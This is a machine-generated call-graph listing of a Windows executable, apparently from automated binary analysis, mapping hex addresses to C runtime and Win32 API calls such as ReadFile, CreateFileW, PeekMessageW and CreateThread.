95587->95567 95588->95578 95589->95576 95590->95585 95591->95570 95593 4afddb 22 API calls 95592->95593 95594 495734 95593->95594 95594->95503 95596 4942d9 95595->95596 95597 4942bc FindResourceExW 95595->95597 95596->95515 95597->95596 95598 4d35ba LoadResource 95597->95598 95598->95596 95599 4d35cf SizeofResource 95598->95599 95599->95596 95600 4d35e3 LockResource 95599->95600 95600->95596 95602 49512e 95601->95602 95603 4d3d90 95601->95603 95607 4bece3 95602->95607 95606->95508 95610 4beaaa 95607->95610 95609 49513c 95609->95515 95614 4beab6 CallCatchBlock 95610->95614 95611 4beac2 95623 4bf2d9 20 API calls _abort 95611->95623 95613 4beae8 95625 4b918d EnterCriticalSection 95613->95625 95614->95611 95614->95613 95616 4beac7 95624 4c27ec 26 API calls pre_c_initialization 95616->95624 95617 4beaf4 95626 4bec0a 62 API calls 2 library calls 95617->95626 95620 4beb08 95627 4beb27 LeaveCriticalSection __fread_nolock 95620->95627 95621 4bead2 __wsopen_s 95621->95609 95623->95616 95624->95621 95625->95617 95626->95620 95627->95621 95631 4be8e1 95628->95631 95630 495118 95630->95521 95632 4be8ed CallCatchBlock 95631->95632 95633 4be92d 95632->95633 95634 4be900 ___scrt_fastfail 95632->95634 95635 4be925 __wsopen_s 95632->95635 95644 4b918d EnterCriticalSection 95633->95644 95658 4bf2d9 20 API calls _abort 95634->95658 95635->95630 95637 4be937 95645 4be6f8 95637->95645 95640 4be91a 95659 4c27ec 26 API calls pre_c_initialization 95640->95659 95644->95637 95649 4be70a ___scrt_fastfail 95645->95649 95651 4be727 95645->95651 95646 4be717 95733 4bf2d9 20 API calls _abort 95646->95733 95648 4be71c 95734 4c27ec 26 API calls pre_c_initialization 95648->95734 95649->95646 95649->95651 95653 4be76a __fread_nolock 95649->95653 95660 4be96c LeaveCriticalSection __fread_nolock 95651->95660 95652 4be886 ___scrt_fastfail 95736 4bf2d9 20 API calls _abort 95652->95736 95653->95651 95653->95652 95661 4bd955 95653->95661 95668 4c8d45 95653->95668 95735 4bcf78 26 API calls 4 library calls 95653->95735 95658->95640 95659->95635 95660->95635 95662 4bd961 95661->95662 95663 4bd976 95661->95663 95737 4bf2d9 20 API calls _abort 95662->95737 95663->95653 95665 4bd966 95738 4c27ec 26 API calls pre_c_initialization 95665->95738 95667 4bd971 95667->95653 95669 4c8d6f 95668->95669 95670 4c8d57 95668->95670 95672 4c90d9 95669->95672 95677 4c8db4 95669->95677 95748 4bf2c6 20 API calls _abort 95670->95748 95764 4bf2c6 20 API calls _abort 95672->95764 95673 4c8d5c 95749 4bf2d9 20 API calls _abort 95673->95749 95676 4c90de 95765 4bf2d9 20 API calls _abort 95676->95765 95679 4c8dbf 95677->95679 95680 4c8d64 95677->95680 95685 4c8def 95677->95685 95750 4bf2c6 20 API calls _abort 95679->95750 95680->95653 95681 4c8dcc 95766 4c27ec 26 API calls pre_c_initialization 95681->95766 95683 4c8dc4 95751 4bf2d9 20 API calls _abort 95683->95751 95687 4c8e08 95685->95687 95688 4c8e2e 95685->95688 95689 4c8e4a 95685->95689 95687->95688 95693 4c8e15 95687->95693 95752 4bf2c6 20 API calls _abort 95688->95752 95755 4c3820 21 API calls 2 library calls 95689->95755 95692 4c8e33 95753 4bf2d9 20 API calls _abort 95692->95753 95739 4cf89b 95693->95739 95694 4c8e61 95697 4c29c8 _free 20 API calls 95694->95697 95702 4c8e6a 95697->95702 95698 4c8fb3 95700 4c9029 95698->95700 95703 4c8fcc GetConsoleMode 95698->95703 95699 4c8e3a 95754 4c27ec 26 API calls pre_c_initialization 95699->95754 95705 4c902d ReadFile 95700->95705 95704 4c29c8 _free 20 API calls 95702->95704 95703->95700 95706 4c8fdd 95703->95706 95707 4c8e71 95704->95707 95708 4c9047 95705->95708 95709 4c90a1 GetLastError 95705->95709 95706->95705 95711 4c8fe3 ReadConsoleW 95706->95711 95712 4c8e7b 95707->95712 95713 4c8e96 95707->95713 95708->95709 95710 4c901e 95708->95710 95714 4c90ae 95709->95714 95715 4c9005 95709->95715 95725 4c906c 95710->95725 95726 4c9083 95710->95726 95730 4c8e45 __fread_nolock 95710->95730 95711->95710 95718 4c8fff GetLastError 95711->95718 95756 4bf2d9 20 API calls _abort 95712->95756 95758 4c9424 28 API calls __wsopen_s 95713->95758 95762 4bf2d9 20 API calls _abort 95714->95762 95715->95730 95759 4bf2a3 20 API calls __dosmaperr 95715->95759 95718->95715 95719 4c29c8 _free 20 API calls 95719->95680 95721 4c90b3 95763 4bf2c6 20 API calls _abort 95721->95763 95723 4c8e80 95757 4bf2c6 20 API calls _abort 95723->95757 95760 4c8a61 31 API calls 3 library calls 95725->95760 95729 4c909a 95726->95729 95726->95730 95761 4c88a1 29 API calls __wsopen_s 95729->95761 95730->95719 95732 4c909f 95732->95730 95733->95648 95734->95651 95735->95653 95736->95648 95737->95665 95738->95667 95740 4cf8a8 95739->95740 95742 4cf8b5 95739->95742 95767 4bf2d9 20 API calls _abort 95740->95767 95744 4cf8c1 95742->95744 95768 4bf2d9 20 API calls _abort 95742->95768 95743 4cf8ad 95743->95698 95744->95698 95746 4cf8e2 95769 4c27ec 26 API calls pre_c_initialization 95746->95769 95748->95673 95749->95680 95750->95683 95751->95681 95752->95692 95753->95699 95754->95730 95755->95694 95756->95723 95757->95730 95758->95693 95759->95730 95760->95730 95761->95732 95762->95721 95763->95730 95764->95676 95765->95681 95766->95680 95767->95743 95768->95746 95769->95743 95773 4be4e8 95770->95773 95772 50275d 95772->95523 95776 4be469 95773->95776 95775 4be505 95775->95772 95777 4be478 95776->95777 95778 4be48c 95776->95778 95784 4bf2d9 20 API calls _abort 95777->95784 95783 4be488 __alldvrm 95778->95783 95786 4c333f 11 API calls 2 library calls 95778->95786 95780 4be47d 95785 4c27ec 26 API calls pre_c_initialization 95780->95785 95783->95775 95784->95780 95785->95783 95786->95783 95792 502e7a 95787->95792 95788 502d3b 95788->95438 95788->95439 95789 4950f5 40 API calls 95789->95792 95790 5028fe 27 API calls 95790->95792 95791 49511f 64 API calls 95791->95792 95792->95788 95792->95789 95792->95790 95792->95791 95794 5022e7 95793->95794 95795 5022d9 95793->95795 95797 50232c 95794->95797 95798 4be5eb 29 API calls 95794->95798 95809 5022f0 95794->95809 95796 4be5eb 29 API calls 95795->95796 95796->95794 95822 502557 95797->95822 95800 502311 95798->95800 95800->95797 95802 50231a 95800->95802 95801 502370 95803 502374 95801->95803 95804 502395 95801->95804 95806 4be678 67 API calls 95802->95806 95802->95809 95805 502381 95803->95805 95808 4be678 67 API calls 95803->95808 95826 502171 95804->95826 95805->95809 95811 4be678 67 API calls 95805->95811 95806->95809 95808->95805 95809->95438 95810 50239d 95812 5023c3 95810->95812 95813 5023a3 95810->95813 95811->95809 95833 5023f3 95812->95833 95815 5023b0 95813->95815 95816 4be678 67 API calls 95813->95816 95815->95809 95817 4be678 67 API calls 95815->95817 95816->95815 95817->95809 95818 5023ca 95819 5023de 95818->95819 95841 4be678 95818->95841 95819->95809 95821 4be678 67 API calls 95819->95821 95821->95809 95823 50257c 95822->95823 95825 502565 __fread_nolock 95822->95825 95824 4be8c4 __fread_nolock 40 API calls 95823->95824 95824->95825 95825->95801 95827 4bea0c ___std_exception_copy 21 API calls 95826->95827 95828 50217f 95827->95828 95829 4bea0c ___std_exception_copy 21 API calls 95828->95829 95830 502190 95829->95830 95831 4bea0c ___std_exception_copy 21 API calls 95830->95831 95832 50219c 95831->95832 95832->95810 95834 502408 95833->95834 95835 5024c0 95834->95835 95837 5021cc 40 API calls 95834->95837 95840 5024c7 95834->95840 95854 502606 95834->95854 95862 502269 40 API calls 95834->95862 95858 502724 95835->95858 95837->95834 95840->95818 95842 4be684 CallCatchBlock 95841->95842 95843 4be6aa 95842->95843 95844 4be695 95842->95844 95846 4be6a5 __wsopen_s 95843->95846 95898 4b918d EnterCriticalSection 95843->95898 95915 4bf2d9 20 API calls _abort 95844->95915 95846->95819 95848 4be69a 95916 4c27ec 26 API calls pre_c_initialization 95848->95916 95849 4be6c6 95899 4be602 95849->95899 95852 4be6d1 95917 4be6ee LeaveCriticalSection __fread_nolock 95852->95917 95855 502617 95854->95855 95856 50261d 95854->95856 95855->95856 95863 5026d7 95855->95863 95856->95834 95859 502731 95858->95859 95860 502742 95858->95860 95861 4bdbb3 65 API calls 95859->95861 95860->95840 95861->95860 95862->95834 95864 502703 95863->95864 95865 502714 95863->95865 95867 4bdbb3 95864->95867 95865->95855 95868 4bdbdd 95867->95868 95869 4bdbc1 95867->95869 95868->95865 95869->95868 95870 4bdbcd 95869->95870 95871 4bdbe3 95869->95871 95879 4bf2d9 20 API calls _abort 95870->95879 95876 4bd9cc 95871->95876 95874 4bdbd2 95880 4c27ec 26 API calls pre_c_initialization 95874->95880 95881 4bd97b 95876->95881 95878 4bd9f0 95878->95868 95879->95874 95880->95868 95882 4bd987 CallCatchBlock 95881->95882 95889 4b918d EnterCriticalSection 95882->95889 95884 4bd995 95890 4bd9f4 95884->95890 95888 4bd9b3 __wsopen_s 95888->95878 95889->95884 95891 4c49a1 27 API calls 95890->95891 95892 4bda09 95891->95892 95893 4bda3a 62 API calls 95892->95893 95894 4bda24 95893->95894 95895 4c4a56 62 API calls 95894->95895 95896 4bd9a2 95895->95896 95897 4bd9c0 LeaveCriticalSection __fread_nolock 95896->95897 95897->95888 95898->95849 95900 4be60f 95899->95900 95901 4be624 95899->95901 95943 4bf2d9 20 API calls _abort 95900->95943 95907 4be61f 95901->95907 95918 4bdc0b 95901->95918 95904 4be614 95944 4c27ec 26 API calls pre_c_initialization 95904->95944 95907->95852 95910 4bd955 __fread_nolock 26 API calls 95911 4be646 95910->95911 95928 4c862f 95911->95928 95914 4c29c8 _free 20 API calls 95914->95907 95915->95848 95916->95846 95917->95846 95919 4bdc23 95918->95919 95921 4bdc1f 95918->95921 95920 4bd955 __fread_nolock 26 API calls 95919->95920 95919->95921 95922 4bdc43 95920->95922 95924 4c4d7a 95921->95924 95945 4c59be 95922->95945 95925 4c4d90 95924->95925 95927 4be640 95924->95927 95926 4c29c8 _free 20 API calls 95925->95926 95925->95927 95926->95927 95927->95910 95929 4c863e 95928->95929 95930 4c8653 95928->95930 96068 4bf2c6 20 API calls _abort 95929->96068 95932 4c868e 95930->95932 95937 4c867a 95930->95937 96070 4bf2c6 20 API calls _abort 95932->96070 95933 4c8643 96069 4bf2d9 20 API calls _abort 95933->96069 95935 4c8693 96071 4bf2d9 20 API calls _abort 95935->96071 96065 4c8607 95937->96065 95940 4c869b 96072 4c27ec 26 API calls pre_c_initialization 95940->96072 95941 4be64c 95941->95907 95941->95914 95943->95904 95944->95907 95946 4c59ca CallCatchBlock 95945->95946 95947 4c59ea 95946->95947 95948 4c59d2 95946->95948 95950 4c5a88 95947->95950 95955 4c5a1f 95947->95955 96024 4bf2c6 20 API calls _abort 95948->96024 96029 4bf2c6 20 API calls _abort 95950->96029 95951 4c59d7 96025 4bf2d9 20 API calls _abort 95951->96025 95954 4c5a8d 96030 4bf2d9 20 API calls _abort 95954->96030 95970 4c5147 EnterCriticalSection 95955->95970 95956 4c59df __wsopen_s 95956->95921 95959 4c5a95 96031 4c27ec 26 API calls pre_c_initialization 95959->96031 95960 4c5a25 95962 4c5a56 95960->95962 95963 4c5a41 95960->95963 95971 4c5aa9 95962->95971 96026 4bf2d9 20 API calls _abort 95963->96026 95966 4c5a51 96028 4c5a80 LeaveCriticalSection __wsopen_s 95966->96028 95967 4c5a46 96027 4bf2c6 20 API calls _abort 95967->96027 95970->95960 95972 4c5ad7 95971->95972 96021 4c5ad0 95971->96021 95973 4c5afa 95972->95973 95974 4c5adb 95972->95974 95977 4c5b4b 95973->95977 95978 4c5b2e 95973->95978 96039 4bf2c6 20 API calls _abort 95974->96039 95982 4c5b61 95977->95982 96045 4c9424 28 API calls __wsopen_s 95977->96045 96042 4bf2c6 20 API calls _abort 95978->96042 95979 4c5cb1 95979->95966 95980 4c5ae0 96040 4bf2d9 20 API calls _abort 95980->96040 96032 4c564e 95982->96032 95985 4c5b33 96043 4bf2d9 20 API calls _abort 95985->96043 95987 4c5ae7 96041 4c27ec 26 API calls pre_c_initialization 95987->96041 95991 4c5b6f 95994 4c5b95 95991->95994 95995 4c5b73 95991->95995 95992 4c5ba8 95997 4c5bbc 95992->95997 95998 4c5c02 WriteFile 95992->95998 95993 4c5b3b 96044 4c27ec 26 API calls pre_c_initialization 95993->96044 96047 4c542e 45 API calls 3 library calls 95994->96047 96014 4c5c69 95995->96014 96046 4c55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 95995->96046 96001 4c5bc4 95997->96001 96002 4c5bf2 95997->96002 96000 4c5c25 GetLastError 95998->96000 96010 4c5b8b 95998->96010 96000->96010 96005 4c5bc9 96001->96005 96006 4c5be2 96001->96006 96050 4c56c4 7 API calls 2 library calls 96002->96050 96007 4c5bd2 96005->96007 96005->96014 96049 4c5891 8 API calls 2 library calls 96006->96049 96048 4c57a3 7 API calls 2 library calls 96007->96048 96010->96014 96015 4c5c45 96010->96015 96010->96021 96012 4c5be0 96012->96010 96013 4c5c8e 96055 4bf2c6 20 API calls _abort 96013->96055 96014->96021 96054 4bf2d9 20 API calls _abort 96014->96054 96017 4c5c4c 96015->96017 96018 4c5c60 96015->96018 96051 4bf2d9 20 API calls _abort 96017->96051 96053 4bf2a3 20 API calls __dosmaperr 96018->96053 96056 4b0a8c 96021->96056 96022 4c5c51 96052 4bf2c6 20 API calls _abort 96022->96052 96024->95951 96025->95956 96026->95967 96027->95966 96028->95956 96029->95954 96030->95959 96031->95956 96033 4cf89b __fread_nolock 26 API calls 96032->96033 96034 4c565e 96033->96034 96036 4c5663 96034->96036 96063 4c2d74 38 API calls 2 library calls 96034->96063 96036->95991 96036->95992 96037 4c5686 96037->96036 96038 4c56a4 GetConsoleMode 96037->96038 96038->96036 96039->95980 96040->95987 96041->96021 96042->95985 96043->95993 96044->96021 96045->95982 96046->96010 96047->96010 96048->96012 96049->96012 96050->96012 96051->96022 96052->96021 96053->96021 96054->96013 96055->96021 96057 4b0a97 IsProcessorFeaturePresent 96056->96057 96058 4b0a95 96056->96058 96060 4b0c5d 96057->96060 96058->95979 96064 4b0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96060->96064 96062 4b0d40 96062->95979 96063->96037 96064->96062 96073 4c8585 96065->96073 96067 4c862b 96067->95941 96068->95933 96069->95941 96070->95935 96071->95940 96072->95941 96074 4c8591 CallCatchBlock 96073->96074 96084 4c5147 EnterCriticalSection 96074->96084 96076 4c859f 96077 4c85c6 96076->96077 96078 4c85d1 96076->96078 96085 4c86ae 96077->96085 96100 4bf2d9 20 API calls _abort 96078->96100 96081 4c85cc 96101 4c85fb LeaveCriticalSection __wsopen_s 96081->96101 96083 4c85ee __wsopen_s 96083->96067 96084->96076 96102 4c53c4 96085->96102 96087 4c86c4 96115 4c5333 21 API calls 2 library calls 96087->96115 96088 4c86be 96088->96087 96089 4c86f6 96088->96089 96092 4c53c4 __wsopen_s 26 API calls 96088->96092 96089->96087 96093 4c53c4 __wsopen_s 26 API calls 96089->96093 96091 4c871c 96094 4c873e 96091->96094 96116 4bf2a3 20 API calls __dosmaperr 96091->96116 96095 4c86ed 96092->96095 96096 4c8702 FindCloseChangeNotification 96093->96096 96094->96081 96098 4c53c4 __wsopen_s 26 API calls 96095->96098 96096->96087 96099 4c870e GetLastError 96096->96099 96098->96089 96099->96087 96100->96081 96101->96083 96103 4c53e6 96102->96103 96104 4c53d1 96102->96104 96107 4bf2c6 __dosmaperr 20 API calls 96103->96107 96109 4c540b 96103->96109 96105 4bf2c6 __dosmaperr 20 API calls 96104->96105 96106 4c53d6 96105->96106 96108 4bf2d9 __dosmaperr 20 API calls 96106->96108 96110 4c5416 96107->96110 96111 4c53de 96108->96111 96109->96088 96112 4bf2d9 __dosmaperr 20 API calls 96110->96112 96111->96088 96113 4c541e 96112->96113 96114 4c27ec pre_c_initialization 26 API calls 96113->96114 96114->96111 96115->96091 96116->96094 96117 491044 96122 4910f3 96117->96122 96119 49104a 96158 4b00a3 29 API calls __onexit 96119->96158 96121 491054 96159 491398 96122->96159 96126 49116a 96127 49a961 22 API calls 96126->96127 96128 491174 96127->96128 96129 49a961 22 API calls 96128->96129 96130 49117e 96129->96130 96131 49a961 22 API calls 96130->96131 96132 491188 96131->96132 96133 49a961 22 API calls 96132->96133 96134 4911c6 96133->96134 96135 49a961 22 API calls 96134->96135 96136 491292 96135->96136 96169 49171c 96136->96169 96140 4912c4 96141 49a961 22 API calls 96140->96141 96142 4912ce 96141->96142 96190 4a1940 96142->96190 96144 4912f9 96200 491aab 96144->96200 96146 491315 96147 491325 GetStdHandle 96146->96147 96148 49137a 96147->96148 96149 4d2485 96147->96149 96152 491387 OleInitialize 96148->96152 96149->96148 96150 4d248e 96149->96150 96151 4afddb 22 API calls 96150->96151 96153 4d2495 96151->96153 96152->96119 96207 50011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96153->96207 96155 4d249e 96208 500944 CreateThread 96155->96208 96157 4d24aa CloseHandle 96157->96148 96158->96121 96209 4913f1 96159->96209 96162 4913f1 22 API calls 96163 4913d0 96162->96163 96164 49a961 22 API calls 96163->96164 96165 4913dc 96164->96165 96166 496b57 22 API calls 96165->96166 96167 491129 96166->96167 96168 491bc3 6 API calls 96167->96168 96168->96126 96170 49a961 22 API calls 96169->96170 96171 49172c 96170->96171 96172 49a961 22 API calls 96171->96172 96173 491734 96172->96173 96174 49a961 22 API calls 96173->96174 96175 49174f 96174->96175 96176 4afddb 22 API calls 96175->96176 96177 49129c 96176->96177 96178 491b4a 96177->96178 96179 491b58 96178->96179 96180 49a961 22 API calls 96179->96180 96181 491b63 96180->96181 96182 49a961 22 API calls 96181->96182 96183 491b6e 96182->96183 96184 49a961 22 API calls 96183->96184 96185 491b79 96184->96185 96186 49a961 22 API calls 96185->96186 96187 491b84 96186->96187 96188 4afddb 22 API calls 96187->96188 96189 491b96 RegisterWindowMessageW 96188->96189 96189->96140 96191 4a1981 96190->96191 96194 4a195d 96190->96194 96216 4b0242 5 API calls __Init_thread_wait 96191->96216 96193 4a196e 96193->96144 96194->96193 96218 4b0242 5 API calls __Init_thread_wait 96194->96218 96195 4a198b 96195->96194 96217 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96195->96217 96197 4a8727 96197->96193 96219 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96197->96219 96201 4d272d 96200->96201 96202 491abb 96200->96202 96220 503209 23 API calls 96201->96220 96204 4afddb 22 API calls 96202->96204 96205 491ac3 96204->96205 96205->96146 96206 4d2738 96207->96155 96208->96157 96221 50092a 28 API calls 96208->96221 96210 49a961 22 API calls 96209->96210 96211 4913fc 96210->96211 96212 49a961 22 API calls 96211->96212 96213 491404 96212->96213 96214 49a961 22 API calls 96213->96214 96215 4913c6 96214->96215 96215->96162 96216->96195 96217->96194 96218->96197 96219->96193 96220->96206 96222 4c8402 96227 4c81be 96222->96227 96225 4c842a 96228 4c81ef try_get_first_available_module 96227->96228 96238 4c8338 96228->96238 96242 4b8e0b 40 API calls 2 library calls 96228->96242 96230 4c83ee 96246 4c27ec 26 API calls pre_c_initialization 96230->96246 96232 4c8343 96232->96225 96239 4d0984 96232->96239 96234 4c838c 96234->96238 96243 4b8e0b 40 API calls 2 library calls 96234->96243 96236 4c83ab 96236->96238 96244 4b8e0b 40 API calls 2 library calls 96236->96244 96238->96232 96245 4bf2d9 20 API calls _abort 96238->96245 96247 4d0081 96239->96247 96241 4d099f 96241->96225 96242->96234 96243->96236 96244->96238 96245->96230 96246->96232 96248 4d008d CallCatchBlock 96247->96248 96249 4d009b 96248->96249 96252 4d00d4 96248->96252 96305 4bf2d9 20 API calls _abort 96249->96305 96251 4d00a0 96306 4c27ec 26 API calls pre_c_initialization 96251->96306 96258 4d065b 96252->96258 96257 4d00aa __wsopen_s 96257->96241 96308 4d042f 96258->96308 96261 4d068d 96340 4bf2c6 20 API calls _abort 96261->96340 96262 4d06a6 96326 4c5221 96262->96326 96265 4d06ab 96266 4d06cb 96265->96266 96267 4d06b4 96265->96267 96339 4d039a CreateFileW 96266->96339 96342 4bf2c6 20 API calls _abort 96267->96342 96271 4d00f8 96307 4d0121 LeaveCriticalSection __wsopen_s 96271->96307 96272 4d06b9 96343 4bf2d9 20 API calls _abort 96272->96343 96273 4d0704 96274 4d0781 GetFileType 96273->96274 96276 4d0756 GetLastError 96273->96276 96344 4d039a CreateFileW 96273->96344 96277 4d078c GetLastError 96274->96277 96278 4d07d3 96274->96278 96345 4bf2a3 20 API calls __dosmaperr 96276->96345 96346 4bf2a3 20 API calls __dosmaperr 96277->96346 96348 4c516a 21 API calls 2 library calls 96278->96348 96279 4d0692 96341 4bf2d9 20 API calls _abort 96279->96341 96283 4d079a CloseHandle 96283->96279 96286 4d07c3 96283->96286 96285 4d0749 96285->96274 96285->96276 96347 4bf2d9 20 API calls _abort 96286->96347 96288 4d07f4 96290 4d0840 96288->96290 96349 4d05ab 72 API calls 3 library calls 96288->96349 96289 4d07c8 96289->96279 96294 4d086d 96290->96294 96350 4d014d 72 API calls 4 library calls 96290->96350 96293 4d0866 96293->96294 96295 4d087e 96293->96295 96296 4c86ae __wsopen_s 29 API calls 96294->96296 96295->96271 96297 4d08fc CloseHandle 96295->96297 96296->96271 96351 4d039a CreateFileW 96297->96351 96299 4d0927 96300 4d0931 GetLastError 96299->96300 96301 4d095d 96299->96301 96352 4bf2a3 20 API calls __dosmaperr 96300->96352 96301->96271 96303 4d093d 96353 4c5333 21 API calls 2 library calls 96303->96353 96305->96251 96306->96257 96307->96257 96309 4d046a 96308->96309 96310 4d0450 96308->96310 96354 4d03bf 96309->96354 96310->96309 96361 4bf2d9 20 API calls _abort 96310->96361 96313 4d045f 96362 4c27ec 26 API calls pre_c_initialization 96313->96362 96315 4d04a2 96316 4d04d1 96315->96316 96363 4bf2d9 20 API calls _abort 96315->96363 96324 4d0524 96316->96324 96365 4bd70d 26 API calls 2 library calls 96316->96365 96319 4d051f 96321 4d059e 96319->96321 96319->96324 96320 4d04c6 96364 4c27ec 26 API calls pre_c_initialization 96320->96364 96366 4c27fc 11 API calls _abort 96321->96366 96324->96261 96324->96262 96325 4d05aa 96327 4c522d CallCatchBlock 96326->96327 96369 4c2f5e EnterCriticalSection 96327->96369 96329 4c5234 96331 4c5259 96329->96331 96335 4c52c7 EnterCriticalSection 96329->96335 96337 4c527b 96329->96337 96373 4c5000 96331->96373 96332 4c52a4 __wsopen_s 96332->96265 96336 4c52d4 LeaveCriticalSection 96335->96336 96335->96337 96336->96329 96370 4c532a 96337->96370 96339->96273 96340->96279 96341->96271 96342->96272 96343->96279 96344->96285 96345->96279 96346->96283 96347->96289 96348->96288 96349->96290 96350->96293 96351->96299 96352->96303 96353->96301 96356 4d03d7 96354->96356 96355 4d03f2 96355->96315 96356->96355 96367 4bf2d9 20 API calls _abort 96356->96367 96358 4d0416 96368 4c27ec 26 API calls pre_c_initialization 96358->96368 96360 4d0421 96360->96315 96361->96313 96362->96309 96363->96320 96364->96316 96365->96319 96366->96325 96367->96358 96368->96360 96369->96329 96381 4c2fa6 LeaveCriticalSection 96370->96381 96372 4c5331 96372->96332 96374 4c4c7d _abort 20 API calls 96373->96374 96375 4c5012 96374->96375 96379 4c501f 96375->96379 96382 4c3405 11 API calls 2 library calls 96375->96382 96376 4c29c8 _free 20 API calls 96378 4c5071 96376->96378 96378->96337 96380 4c5147 EnterCriticalSection 96378->96380 96379->96376 96380->96337 96381->96372 96382->96375 96383 4e2a00 96397 49d7b0 messages 96383->96397 96384 49db11 PeekMessageW 96384->96397 96385 49d807 GetInputState 96385->96384 96385->96397 96386 4e1cbe TranslateAcceleratorW 96386->96397 96388 49db8f PeekMessageW 96388->96397 96389 49db73 TranslateMessage DispatchMessageW 96389->96388 96390 49da04 timeGetTime 96390->96397 96391 49dbaf Sleep 96409 49dbc0 96391->96409 96392 4e2b74 Sleep 96392->96409 96393 4e1dda timeGetTime 96560 4ae300 23 API calls 96393->96560 96394 4ae551 timeGetTime 96394->96409 96397->96384 96397->96385 96397->96386 96397->96388 96397->96389 96397->96390 96397->96391 96397->96392 96397->96393 96404 49d9d5 96397->96404 96415 49dd50 96397->96415 96422 49dfd0 96397->96422 96445 4a1310 96397->96445 96501 49bf40 96397->96501 96559 4aedf6 IsDialogMessageW GetClassLongW 96397->96559 96561 503a2a 23 API calls 96397->96561 96562 49ec40 96397->96562 96586 50359c 82 API calls __wsopen_s 96397->96586 96398 4e2c0b GetExitCodeProcess 96400 4e2c37 CloseHandle 96398->96400 96401 4e2c21 WaitForSingleObject 96398->96401 96400->96409 96401->96397 96401->96400 96402 4e2a31 96402->96404 96403 5229bf GetForegroundWindow 96403->96409 96405 4e2ca9 Sleep 96405->96397 96409->96394 96409->96397 96409->96398 96409->96402 96409->96403 96409->96404 96409->96405 96587 515658 23 API calls 96409->96587 96588 4fe97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96409->96588 96589 4fd4dc 47 API calls 96409->96589 96416 49dd6f 96415->96416 96417 49dd83 96415->96417 96590 49d260 235 API calls 2 library calls 96416->96590 96591 50359c 82 API calls __wsopen_s 96417->96591 96420 49dd7a 96420->96397 96421 4e2f75 96421->96421 96423 49e010 96422->96423 96434 49e0dc messages 96423->96434 96594 4b0242 5 API calls __Init_thread_wait 96423->96594 96426 50359c 82 API calls 96426->96434 96427 4e2fca 96430 49a961 22 API calls 96427->96430 96427->96434 96428 49e3e1 96428->96397 96429 49a961 22 API calls 96429->96434 96433 4e2fe4 96430->96433 96595 4b00a3 29 API calls __onexit 96433->96595 96434->96426 96434->96428 96434->96429 96438 49ec40 235 API calls 96434->96438 96441 49a8c7 22 API calls 96434->96441 96442 4a04f0 22 API calls 96434->96442 96592 49a81b 41 API calls 96434->96592 96593 4aa308 235 API calls 96434->96593 96597 4b0242 5 API calls __Init_thread_wait 96434->96597 96598 4b00a3 29 API calls __onexit 96434->96598 96599 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96434->96599 96600 5147d4 235 API calls 96434->96600 96601 5168c1 235 API calls 96434->96601 96437 4e2fee 96596 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96437->96596 96438->96434 96441->96434 96442->96434 96446 4a17b0 96445->96446 96447 4a1376 96445->96447 96692 4b0242 5 API calls __Init_thread_wait 96446->96692 96448 4a1390 96447->96448 96449 4e6331 96447->96449 96451 4a1940 9 API calls 96448->96451 96697 51709c 235 API calls 96449->96697 96454 4a13a0 96451->96454 96453 4a17ba 96456 4a17fb 96453->96456 96458 499cb3 22 API calls 96453->96458 96457 4a1940 9 API calls 96454->96457 96455 4e633d 96455->96397 96460 4e6346 96456->96460 96462 4a182c 96456->96462 96459 4a13b6 96457->96459 96465 4a17d4 96458->96465 96459->96456 96461 4a13ec 96459->96461 96698 50359c 82 API calls __wsopen_s 96460->96698 96461->96460 96485 4a1408 __fread_nolock 96461->96485 96694 49aceb 23 API calls messages 96462->96694 96693 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96465->96693 96466 4a1839 96695 4ad217 235 API calls 96466->96695 96469 4e636e 96699 50359c 82 API calls __wsopen_s 96469->96699 96470 4a152f 96472 4a153c 96470->96472 96473 4e63d1 96470->96473 96475 4a1940 9 API calls 96472->96475 96701 515745 54 API calls _wcslen 96473->96701 96476 4a1549 96475->96476 96480 4e64fa 96476->96480 96482 4a1940 9 API calls 96476->96482 96477 4afddb 22 API calls 96477->96485 96478 4a1872 96696 4afaeb 23 API calls 96478->96696 96479 4afe0b 22 API calls 96479->96485 96489 4e6369 96480->96489 96702 50359c 82 API calls __wsopen_s 96480->96702 96487 4a1563 96482->96487 96484 49ec40 235 API calls 96484->96485 96485->96466 96485->96469 96485->96470 96485->96477 96485->96479 96485->96484 96486 4e63b2 96485->96486 96485->96489 96700 50359c 82 API calls __wsopen_s 96486->96700 96487->96480 96490 49a8c7 22 API calls 96487->96490 96492 4a15c7 messages 96487->96492 96489->96397 96490->96492 96491 4a1940 9 API calls 96491->96492 96492->96478 96492->96480 96492->96489 96492->96491 96494 4a167b messages 96492->96494 96496 494f39 68 API calls 96492->96496 96602 51959f 96492->96602 96605 506ef1 96492->96605 96685 51958b 96492->96685 96688 4fd4ce 96492->96688 96493 4a171d 96493->96397 96494->96493 96691 4ace17 22 API calls messages 96494->96691 96496->96492 97007 49adf0 96501->97007 96503 49bf9d 96504 49bfa9 96503->96504 96505 4e04b6 96503->96505 96507 4e04c6 96504->96507 96508 49c01e 96504->96508 97020 50359c 82 API calls __wsopen_s 96505->97020 97021 50359c 82 API calls __wsopen_s 96507->97021 97012 49ac91 96508->97012 96511 49c7da 96517 4afe0b 22 API calls 96511->96517 96513 4f7120 22 API calls 96557 49c039 __fread_nolock messages 96513->96557 96515 4afddb 22 API calls 96515->96557 96525 49c808 __fread_nolock 96517->96525 96520 4e04f5 96522 4e055a 96520->96522 97022 4ad217 235 API calls 96520->97022 96544 49c603 96522->96544 97023 50359c 82 API calls __wsopen_s 96522->97023 96523 4afe0b 22 API calls 96556 49c350 __fread_nolock messages 96523->96556 96524 49af8a 22 API calls 96524->96557 96525->96523 96526 4e091a 97033 503209 23 API calls 96526->97033 96529 49ec40 235 API calls 96529->96557 96530 4e08a5 96531 49ec40 235 API calls 96530->96531 96533 4e08cf 96531->96533 96533->96544 97031 49a81b 41 API calls 96533->97031 96534 4e0591 97024 50359c 82 API calls __wsopen_s 96534->97024 96535 4e08f6 97032 50359c 82 API calls __wsopen_s 